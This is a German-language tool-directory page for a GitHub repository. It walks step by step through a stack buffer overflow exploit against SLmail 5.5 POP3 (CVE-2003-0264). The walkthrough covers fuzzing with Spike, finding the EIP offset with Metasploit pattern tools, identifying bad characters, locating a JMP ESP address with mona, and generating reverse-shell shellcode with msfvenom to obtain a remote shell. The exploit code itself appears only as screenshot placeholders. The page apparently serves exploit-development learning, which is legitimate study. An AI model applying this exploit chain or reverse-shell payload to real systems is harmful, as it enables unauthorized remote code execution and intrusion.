Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2003-0264_EXPLOIT — Pufferüberlauf in Seattle Lab Mail (SLmail) 5.5 - POP3 | Kitploit
Tools/GitHubGitHub/vrikodar/cve-2003-0264_exploit
ExploitationShellcodeDebuggerFuzzingPenetrationstestsLernen & BildungPayload-EntwicklungBinary-Exploitation
GitHubvrikodar/cve-2003-0264_exploit

CVE-2003-0264_EXPLOIT

Pufferüberlauf in Seattle Lab Mail (SLmail) 5.5 - POP3

Repository anzeigen
4vor 5 JahrenNoch nicht geprüft
Webseite

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE-2003-0264_EXPLOIT

Pufferüberlauf in Seattle Lab Mail (SLmail) 5.5 - POP3

Einfacher stapelbasierter Pufferüberlauf Schritt für Schritt

1) Fuzzen der Anwendung

Im allerersten Schritt werden wir die Anwendung mit einem einfachen Spike-Skript fuzzen

währenddessen haben wir SLmail auch an Immunity Debugger angehängt [und ausgeführt]

Mehr über Spike:: https://resources.infosecinstitute.com/topic/intro-to-fuzzing/

Hier ist ein einfaches Spike-Skript namens spike_fuzz.spk

wir werden es mit dem folgenden Befehl gegen die Anwendung ausführen

root@kitploit:~
  line_send_tcp 192.168.1.117 110 spike_fuzz.spk

wobei 192.168.1.117 die IP des Zielsystems ist, auf dem SLMail läuft, und es läuft auf Port 110

Capture

In der Zwischenzeit, wenn wir Immunity betrachten, sehen wir, dass die Anwendung abgestürzt ist

Capture

2) POC zum Nachstellen des Absturzes

Jetzt erstellen wir einen Python-POC, der den Absturz nachstellt und die Bytes berechnet, bei denen die Anwendung abstürzt

root@kitploit:~
           python poc_crash.py

Capture

3) Finden des Offsets

Zum Finden des Offsets verwenden wir msf

root@kitploit:~
      1. Zuerst ein Pattern erzeugen
      2. Die EIP notieren
      3. Diese EIP und Länge mit MSF abfragen, um den Offset zu finden

msf-pattern_create -l 2700

Capture

In poc_offset.py verwenden wir dieses Pattern als unseren Overflow-Buffer!

root@kitploit:~
       python poc_offset.py

Capture

An diesem Punkt notieren wir auch den EIP-Wert in Immunity, wo die Anwendung abgestürzt und angehalten ist

Capture

root@kitploit:~
        EIP ist 39694438
        ::Zum Finden des Offsets::
        
        msf-pattern_offset -l 2700 -q 39694438

Capture

Offset ist 2606, das bedeutet 2606 Bytes, bevor wir zum EIP gelangen::: und das EIP selbst ist 4 Bytes lang

4) Steuerung des EIP

Jetzt versuchen wir, das EIP mit 4 B's zu überschreiben, d.h.:: in Immunity sollten wir 42424242 {Hex für 4 B's} sehen

root@kitploit:~
        python poc_eip_control.py

Capture

Und jetzt, wenn wir Immunity prüfen

Capture

5) Finden der Bad Characters

Um es einfach und kurz zu halten

Du kannst das Skript poc_badchars.py ausführen und die Bad Characters dann selbst finden

Um es kurz zu halten

Diese Anwendung hat zwei Bad Characters {welche auch die Standard-Badchars sind}. Wenn wir poc_badchars.py zum ersten Mal ausführen, werden wir sehen, dass das Zeichen \x0a Probleme macht, und dann entfernen wir dieses aus unserem Badchars-Payload und führen das Skript erneut aus. Beim zweiten Mal werden wir sehen, dass das Zeichen \x0d übersprungen wird, das ist also unser zweiter Badchar, und wir entfernen es aus unserem Payload. Danach, wenn wir das Skript zum dritten Mal ausführen, ist alles klar und gut!

root@kitploit:~
        Badchars sind :: \x00\x0a\x0d
        {Nullbyte, Zeilenvorschub, Wagenrücklauf}

        python poc_badchars.py

6) Finden des richtigen Moduls und der Adresse

Zuerst finden wir das richtige Modul mithilfe von Mona Modules in Immunity

root@kitploit:~
              slmfc.dll ist der am besten geeignete Kandidat, da es keinen Speicherschutz besitzt!

Capture

und nun finden wir eine JMP-ESP-Adresse in dieser DLL

Diese Adresse wird in das EIP geschrieben, sodass wir die Programmausführung zum ESP umleiten können, was zur Ausführung unseres Shellcodes führt!

root@kitploit:~
        !mona find -s "\xff\xe4" -m slmfc.dll
        
        {\xff\xe4 Opcode entspricht JMP ESP}

Capture

Von 19 Zeigeradressen wählen wir die erste

7) Eine Shell droppen

Jetzt setzen wir alles zusammen und droppen eine Shell

root@kitploit:~
              1.) Den Shellcode erzeugen {ohne Badchars}
              2.) Die gefundene Adresse hinzufügen {denke an Little Endian}
              3.) Den Buffer, die Rücksprungadresse, ein paar NOP-Sleds und den Shellcode hinzufügen
              4.) Wir haben eine Shell

Lass uns schnell mit msfvenom Shellcode erzeugen

root@kitploit:~
        msfvenom -p windows/shell_reverse_tcp LHOST=<lstening-ip> LPORT=<listening-port> EXITFUNC=thread -f py -a x86 -b "\x00\x0a\x0d"

Capture

Wir setzen alles in der Datei exploit.py zusammen

Capture

Dieses Mal führen wir SLmail ohne Immunity aus und hören gleichzeitig auf eingehende Verbindungen

Sobald das erledigt ist, führen wir das finale exploit.py-Skript aus!

Capture

AUSGEZEICHNET, WIR HABEN EINE SHELL!

Tool herunterladen